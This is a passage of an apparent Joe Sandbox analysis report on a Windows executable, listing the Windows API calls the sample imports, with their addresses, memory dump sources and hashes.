                                                                              • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                              • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                              • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                              • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494EAC
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494EB9
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                              • API String ID: 667068680-2254406584
                                                                              • Opcode ID: 86a2ddc52e299a4ebb71bf23d73df01b3b4fd34307be7bd5855d98afd1a17bd4
                                                                              • Instruction ID: 92166a125eb2f71293346f1714c1de0d588af794120117df170beecaff70c54b
                                                                              • Opcode Fuzzy Hash: 86a2ddc52e299a4ebb71bf23d73df01b3b4fd34307be7bd5855d98afd1a17bd4
                                                                              • Instruction Fuzzy Hash: 5FF0F65278171627DE1026668C41F7F6ACCDBD5761F050137BE05AB3C2E99C8C0242FD
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4E1
                                                                              • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4F1
                                                                              • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D501
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                               • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                              • API String ID: 190572456-212574377
                                                                              • Opcode ID: 0cec18ecd77b334d9913731d687bcbf118ffb91831bb9c9ad7683d7253c977df
                                                                              • Instruction ID: f545bb075b74a91891c18b47f2e11744e93a99b0212facb5d31f4bd58d546edf
                                                                              • Opcode Fuzzy Hash: 0cec18ecd77b334d9913731d687bcbf118ffb91831bb9c9ad7683d7253c977df
                                                                              • Instruction Fuzzy Hash: 6EF0D0B0D01704EAE724DFB6ACC77363A959BA431AF14943B9A0D96263E678044DCF2D
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480DAC), ref: 0042EA35
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
                                                                              • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
                                                                                • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                              • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                              • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                              • API String ID: 142928637-2676053874
                                                                              • Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                              • Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
                                                                              • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                              • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                              • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                              • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                              • API String ID: 2238633743-1050967733
                                                                              • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                              • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                              • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                              • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498794), ref: 00478746
                                                                              • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478753
                                                                              • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478763
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                              • API String ID: 667068680-222143506
                                                                              • Opcode ID: c231c6f2b70c156a9a87dd751a131f3597001cd76c60e66cfe2a3d12b45a0e7a
                                                                              • Instruction ID: d9a2c3c187cd73cba94933972f30ec689a131e62bb2a59a557d4d9670201d7da
                                                                              • Opcode Fuzzy Hash: c231c6f2b70c156a9a87dd751a131f3597001cd76c60e66cfe2a3d12b45a0e7a
                                                                              • Instruction Fuzzy Hash: 79C0C9F02C0700EA9604B7F11CCBA7A2548C500729330803FB19EA6182D97C0C104A6C
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B745
                                                                              • GetDC.USER32(?), ref: 0041B751
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                              • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                              • String ID:
                                                                              • API String ID: 3275473261-0
                                                                              • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                              • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                              • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                              • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041BA17
                                                                              • GetDC.USER32(?), ref: 0041BA23
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                              • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                              • String ID:
                                                                              • API String ID: 3275473261-0
                                                                              • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                              • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                              • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                              • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                              APIs
                                                                              • GetFocus.USER32 ref: 0041B57E
                                                                              • GetDC.USER32(?), ref: 0041B58A
                                                                              • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                              • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                              • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                              • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                              • String ID:
                                                                              • API String ID: 2502006586-0
                                                                              • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                              • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                              • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                              • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                              APIs
                                                                              • SetLastError.KERNEL32(00000057,00000000,0045CF68,?,?,?,?,00000000), ref: 0045CF07
                                                                              • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFD4,?,00000000,0045CF68,?,?,?,?,00000000), ref: 0045CF46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                              • API String ID: 1452528299-1580325520
                                                                              • Opcode ID: 1bdeb0a210bc513e3c49bf4cbd891cc1911c01b4b436513822a1df069e086b30
                                                                              • Instruction ID: 452c5d812052531473411f8275c40b5c85b18bf76fc7955a310c39f58cd58d14
                                                                              • Opcode Fuzzy Hash: 1bdeb0a210bc513e3c49bf4cbd891cc1911c01b4b436513822a1df069e086b30
                                                                              • Instruction Fuzzy Hash: 3811A536204304AFD711DAA1C9C2A9EB69EDB44706F604037AD00A62C7D67C5F0AD52D
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                              • GetDC.USER32(00000000), ref: 0041BDE9
                                                                              • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDeviceMetricsSystem$Release
                                                                              • String ID:
                                                                              • API String ID: 447804332-0
                                                                              • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                              • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                              • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                              • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                              • LocalFree.KERNEL32(007FF478,00000000,00401B68), ref: 00401ACF
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,007FF478,00000000,00401B68), ref: 00401AEE
                                                                              • LocalFree.KERNEL32(00800478,?,00000000,00008000,007FF478,00000000,00401B68), ref: 00401B2D
                                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                              • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                              • String ID:
                                                                              • API String ID: 3782394904-0
                                                                              • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                              • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                              • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                              • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E24A
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CBBD), ref: 0047E270
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0047E280
                                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2A1
                                                                              • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2B5
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$Show
                                                                              • String ID:
                                                                              • API String ID: 3609083571-0
                                                                              APIs
                                                                                • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                              • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                              • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                              Similarity
                                                                              • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                              • String ID:
                                                                              • API String ID: 3527656728-0
                                                                              APIs
                                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                              • ShowWindow.USER32(?,00000005,00000000,00497B31,?,?,00000000), ref: 00497902
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,0049792A,00000000,00497AFD,?,?,00000005,00000000,00497B31,?,?,00000000), ref: 004072B3
                                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                              • String ID: .dat$.msg$IMsg$Uninstall
                                                                              • API String ID: 3312786188-1660910688
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                              • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                              • API String ID: 828529508-2866557904
                                                                              APIs
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00457E78
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00457E99
                                                                              • CloseHandle.KERNEL32(?,00457ECC), ref: 00457EBF
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                              • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                              • API String ID: 2573145106-3235461205
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,0045703D,004573E0,00456F94,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                              • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                              • String ID: ChangeWindowMessageFilter$user32.dll
                                                                              • API String ID: 3478007392-2498399450
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004776BC
                                                                              • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004777B3,0049C0A4,00000000), ref: 004776CF
                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004776D5
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                              • String ID: AllowSetForegroundWindow$user32.dll
                                                                              • API String ID: 1782028327-3855017861
                                                                              APIs
                                                                              • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                              • SaveDC.GDI32(?), ref: 00416C83
                                                                              • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                              • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                              • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                              Similarity
                                                                              • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                              • String ID:
                                                                              • API String ID: 3808407030-0
                                                                              APIs
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                              • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                              • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                              • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                              • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                              • GetDC.USER32(00000000), ref: 0041BC12
                                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                              • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
